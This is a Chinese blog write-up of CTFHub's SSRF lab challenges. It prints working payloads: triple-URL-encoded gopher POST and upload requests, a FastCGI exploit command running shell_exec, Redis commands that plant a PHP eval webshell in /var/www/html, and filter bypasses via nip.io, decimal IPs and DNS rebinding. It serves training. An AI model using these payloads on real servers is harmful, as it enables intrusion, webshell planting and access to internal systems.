CTFHub SSRF(服务器请求伪造) WriteUP

最新推荐文章于 2024-03-29 18:33:49 发布
最新推荐文章于 2024-03-29 18:33:49 发布
阅读量858 收藏 4
点赞数
文章标签: web http apache 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tangshuangsss/article/details/119687373
版权

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维

让我们每天进步一点点

简介

CTFHub 为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。

「赛事中心」提供全网最全最新的 CTF 赛事信息,关注赛事定制自己专属的比赛日历吧。

「技能树」提供清晰的 CTF 学习路线,想要变强就加点,哪里不会点哪里。

「历年真题」提供无限次赛后复盘,边学边练。

「工具」提供各类常用工具,打仗没有一把趁手的武器怎么行。

实战

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。

SSRF漏洞目前是比较常见的,从多个角度来进行讲解

一、内网访问

1.打开靶机后给出一个url

2.直接访问flag.php即可,根据题目名字可以看出来是访问内网。

二、伪协议读取文件

1.使用file进行读取,这个题目需要知道php有哪些伪协议和基本常识,比如页面文件默认放到哪个目录下。

三、端口扫描

1.题目上有提示扫描8000-9000

2.直接使用burpsutie爆破一波

3.用字典工具生成8000-9000的密码表,直接开跑,8163

四、POST请求

1.题目中说使用curl来进行,直接上url就行

2.访问后发现一个输入框

3.查看源码发现一个key

4.我们首先构造一个POST请求。下面的是最基本的POST请求,也就是说如果构造POST,至少下面这些的内容一定要有。

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36


key=8e1bad5e0b0e59ce4b8f401fc61dedef

5.注意Content-Length那里,必须和你的POST请求长度一样,不然结果就出不了。接下来我们要把这个POST请求进行一次URL编码:

POST%20%2Fflag.php%20HTTP%2F1.1%0AHost%3A%20127.0.0.1%3A80%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AContent-Length%3A%2036%0A%0Akey%3Dfad5d6e7f2d9efb2ce25f018bd18cfd9

6.这里又是一个问题,首先就是对换行的处理。如果你的POST请求编码出来的换行是%0A,就需要把%0A改成%0D%0A:

POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3Dfad5d6e7f2d9efb2ce25f018bd18cfd9

7.然后还要再进行2次URL编码,也就是说一共要进行三次URL编码,我当时就是因为只进行了2次,就没弄到flag。

最终:

POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253Dfad5d6e7f2d9efb2ce25f018bd18cfd9

8.使用伪协议gopher构造url即可,这里有个坑,题目说是使用302.php跳转,结果是需要从index.php跳转,而且必须要在浏览器中输入。

五、上传文件

1.根据题目需要上传一个文件,先看看flag.php

2.上传时发现没有上传按钮,修改一下源码,添加一个

3.随便上传一个文件看看

4.使用burpsutie查看一下,再把新增的去掉

5.把上面部分删除后全部复制url编码一次,%0a换成%0d%0a后,再url编码一次

6.payload

/?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520challenge-800b39a5382e13b1.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A89.0)%2520Gecko%252F20100101%2520Firefox%252F89.0%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252Cimage%252Fwebp%252C*%252F*%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge-800b39a5382e13b1.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250D%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------74678227140532112573885107383%250D%250AContent-Length%253A%2520437%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge-800b39a5382e13b1.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250A%250D%250A-----------------------------74678227140532112573885107383%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522webshell%2520.html%2522%250D%250AContent-Type%253A%2520image%252Fjpeg%250D%250A%250D%250A%25C3%25A6%25C2%2588%25C2%2591%25C3%25A6%25C2%2598%25C2%25AF%25C3%25A4%25C2%25B8%25C2%2580%25C3%25A4%25C2%25B8%25C2%25AA%25C3%25A6%25C2%259C%25C2%25A8%25C3%25A9%25C2%25A9%25C2%25AC%25C3%25A6%25C2%2596%25C2%2587%25C3%25A4%25C2%25BB%25C2%25B6%25C3%25A6%25C2%2588%25C2%2591%25C3%25A5%25C2%2595%25C2%25A5%25C3%25A9%25C2%2583%25C2%25BD%25C3%25A8%25C2%2583%25C2%25BD%25C3%25A5%25C2%25B9%25C2%25B2%25C3%25AF%25C2%25BC%25C2%258C%25C3%25A5%25C2%25B0%25C2%25B1%25C3%25A9%25C2%2597%25C2%25AE%25C3%25A4%25C2%25BD%25C2%25A0%25C3%25A6%25C2%2580%25C2%2595%25C3%25A4%25C2%25B8%25C2%258D%25C3%25A6%25C2%2580%25C2%2595%25C3%25AF%25C2%25BC%25C2%2581%25C3%25AF%25C2%25BC%25C2%2581%25C3%25AF%25C2%25BC%25C2%2581%253Cphp%2520phpinfo()%253B%253F%253E%250D%250A-----------------------------74678227140532112573885107383

7.使用payload获得flag

六、FastCGI协议

1.这个还是蛮复杂的需要查看下面内容,该文章已经说明漏洞环境,只需要直接利用就行了。

https://blog.csdn.net/mysteryflower/article/details/94386461

2.配置一个本地监听并使用hexdump生成对照信息

3.使用exp执行下面命令来生成一个请求包

python2 FastCGI_exp.py -c "<?php var_dump(shell_exec('ls /'));?>" -p 9000 127.0.0.1 /usr/local/lib/php/PEAR.php

4.查看一下1.txt,下面就是生成的请求

5.python3处理一下内容

6.生成的使用payload获得flag文件

7.修改使用cat命令,第2-6步访问flag文件,获取flag

七、Redis

1.redis命令,需要把下面命令生成url

flushall
set 1 '<?php eval($_GET["cmd"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save

2.网上找到的转换脚本

3.运行后生成payload

%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%3C%253Fphp%2520eval%2528%2524_GET%255B%22cmd%22%255D%2529%253B%253F%3E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A

4.使用payload在浏览器中上传一句话

gopher://127.0.0.1:6379/_payload

5.在shell上执行命令查询flag文件

6.查看flag文件获取flag

八、URL Bypass

1.利用nip.io,这个是一个dns解析网站访问www.xxx.com.1.1.1.1.nip.io,会解析为1.1.1.1

2.生成payload

?url=http://notfound.ctfhub.com.127.0.0.1.nip.io/flag.php

3.使用payload获得flag

九、数字IP Bypass

1.题目提示说不能使用点分十进制,使用转换成数字IP,网上工具一大堆哈

2.把127.0.0.1转换为数字IP

3.生成payload

?url=http://2130706433/flag.php

4.使用payload获得flag

十、302跳转 Bypass

1.根据题目提示说禁止访问127.0.0.1,需要使用302进行跳转

2.其实127.0.0.1还有一种写法:localhost  生成payload

?url=localhost/flag.php

3.使用payload获得flag,这道题感觉有点象脑筋急转弯

十一、DNS重绑定 Bypass

1.根据题目附件学习了什么是DNS重绑定e

2.使用lock.cmpxchg8b.com网站生成一个重绑定域名

3.使用生成的域名构造payload

?url=7f000001.7f000002.rbndr.us/flag.php

4.使用payload获得flag

总结:SSRF太考验脑洞了,其中使用的脚本和工具也比较多,想要学好SSRF必须要学习大量代码类的知识,加油吧!!!

往期内容

CTFHub RCE(命令执行、文件包含) WriteUP

ATT&CK实战-红队评估之二

简单讲解一下什么是ATT&CK框架

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗      

TaibaiXX1
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
/c6.e3b.biz/index.php,iptv-m3u-maker/tv.m3u8 at d59f4e688e2b4486d6219f094aac886be53c25d2 · srsman/ip...
weixin_29763721的博客
03-23 7749
#EXTINF:-1, group-title="其他频道", Oxigeno90http://i50.letio.com/9102.aac#EXTINF:-1, group-title="其他频道", ProyectoPhttp://149.56.23.143:8200/stream#EXTINF:-1, group-title="其他频道", Report-TVhttp://66.55.93....
Web安全SSRF漏洞
热门推荐
我不是大牛
07-04 2万+
内容 SSRF漏洞的危害 SSRF漏洞的挖掘 SSRF漏洞的防御 SSRF漏洞原理概述 背景 SSRF(Server-Side Request Forgery:服务器请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 概述 很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片...
CTFHUB SSRF 【全】
Jay17的博客
04-17 1255
CTFHUB SSRF 题解 【全】
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
最新发布
qq_75120258的博客
03-29 1348
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
【漏洞学习——SSRF】小米某处SSRF漏洞(可内网SHELL 附多线程Fuzz脚本)
Fly_鹏程万里
02-22 1304
漏洞细节 #1 存在漏洞位置,Discuz 论坛SSRF漏洞 http://www.miui.com/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://fuzz.wuyun.com/302.php?data=helo.jpg[/img] #2 服务器支持dict、ftp、http协议 http://www.mi...
SSRF详解 基于CTFHub(下篇)
Bossfrank的博客
04-28 1095
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
SSRF-Testing:SSRF(服务器请求伪造)测试资源
04-23
SSRF(服务器请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
SSRF服务端请求伪造攻击-漏洞银行大咖面对面10-Mat
07-31
SSRF服务端请求伪造攻击-漏洞银行大咖面对面10-Mat
SSRF_Vulnerable_Lab:本实验包含易受服务器请求伪造攻击的示例代码
05-12
服务器请求伪造SSRF)易受攻击的实验室该存储库包含容易受到服务器请求伪造SSRF)攻击PHP代码。 我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的...
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
008-Web安全基础4 - 请求伪造漏洞.pptx
10-11
CSRF 的全称是Cross-site request forgery,即跨站请求伪造,我们可以简单的理解这种漏洞为,攻击者利用被攻击者的身份发起了某些被攻击者原本不知情的网络请求。包括以被攻击者的身 份发布一条微博,以被攻击者的...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
ctfshow-ssrf writeup
qq_41274349的博客
09-17 1759
ctfshow ssrf 解题指南
易霖博CTF——Writeup
Lethe's Blog
03-30 1691
签到题 EasyRSA 给了flag.en和rsa_private_key.pem私钥,直接用openssl解密,得到flag{We1c0meCtf3r_elab} Web1 rce_nopar php的无参数rce,利用PHPSESSID,参考:https://xz.aliyun.com/t/6316#toc-8 脚本如下: import requests import binascii p...
ctfhub-fastcgi协议
o3Ev的博客
07-13 1605
ctfhub-fastcgi协议 这道题是关于fastcgi协议的东西,具体的fastcgi的东西就不介绍了,附件有,网上也有很多师傅写了的,我这里就直接说下题的思路 fastcgi是向php-fpm发送报文的,而由于php-fpm的默认端口是9000,所以我们用nc去监听下9000端口 nc -lvvp 9000>yy.txt 使用大师傅的exp去打就行: import socket import random import argparse import sys from io import B
CTFHub WP PHP-FPM
m0_62879498的博客
04-09 798
CTFHub WP PHP-FPM PHP-FPM未授权访问漏洞 早期的web服务器只能处理html等静态服务器,但是随着 技术的发展出现的动态语言,web服务器无法处理。这时候出现了各种语言的解释器,但是web服务器如何于语言解释器进行沟通,如何去判断是什么语言,这时候 cgi协议应运而生。只要我们按照cgi协议去编写代码,就可以被服务器识别。 但是 web服务器每收到一个请求,都会去请求一个 cgi程序 ,解析完成结束进程。这样的话,假如请求次数过多,每一个请求都会进行一次 开启、结束,造成了资源的浪费
BUUCTF web writeup
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
实验吧CTFWeb writeup 第二部分
Senimo
08-21 1065
实验吧CTFWeb writeup 第二部分天网管理系统忘记密码了Once MoreGuess Next SessionFALSE上传绕过NSCTF web200程序逻辑问题what a fuck!这是什么鬼东西?PHP大法这个看起来有点简单!貌似有点难头有点大猫抓老鼠看起来有点难 天网管理系统 分值:10 难度:易 天网你敢来挑战嘛 格式:ctf{ } 解题链接 忘记密码了 分值:20 难度:...
python技能树_CTFHub技能树WEB之信息泄露
weixin_39791152的博客
01-14 104
官网地址目录遍历启动环境打开页面,发现页面高数点击直接开始找2. 进来页面后就这这个场景,标题写的“flag_in_here”于是就开始一个目录一个,目录的找吧3. 然后我再目录1里面找到了一个“falg.txt”文本文件,打开它,就可以得到flag了4. 每个人的flag地址应该是随机的,所以耐心找两分钟就找到了PHPINFO依然启动环境打开环境,发现和前面的题目页面差不多,那我们还是点开就去看...
ssrf服务器请求伪造
07-22
关于 SSRF (Server-Side Request Forgery) 的问题,我可以为你提供一些基本的信息。SSRF 是一种安全漏洞,攻击者可以利用它来伪造服务器发出的请求。攻击者可以通过构造恶意请求,使服务器发送请求到内部网络或其他受保护的资源。 为了防止 SSRF 攻击,有几个建议和防护措施可以考虑: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保输入的 URL 是合法的,并且只允许访问可信的资源。 2. 白名单:限制服务器可以访问的资源范围,使用白名单来限制服务器发出请求的目标。 3. 限制协议和端口:限制服务器可以使用的协议和端口,防止服务器发出恶意请求。 4. 安全配置:确保服务器安全配置是正确的,包括限制服务器的访问权限和网络隔离。 5. 日志监控:监控服务器的访问日志,及时发现和响应可能的攻击行为。 以上只是一些基本的防护措施,对于特定环境和应用程序,可能需要更具体的安全措施来保护系统免受 SSRF 攻击。同时,及时更新和维护服务器和应用程序的安全补丁也是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值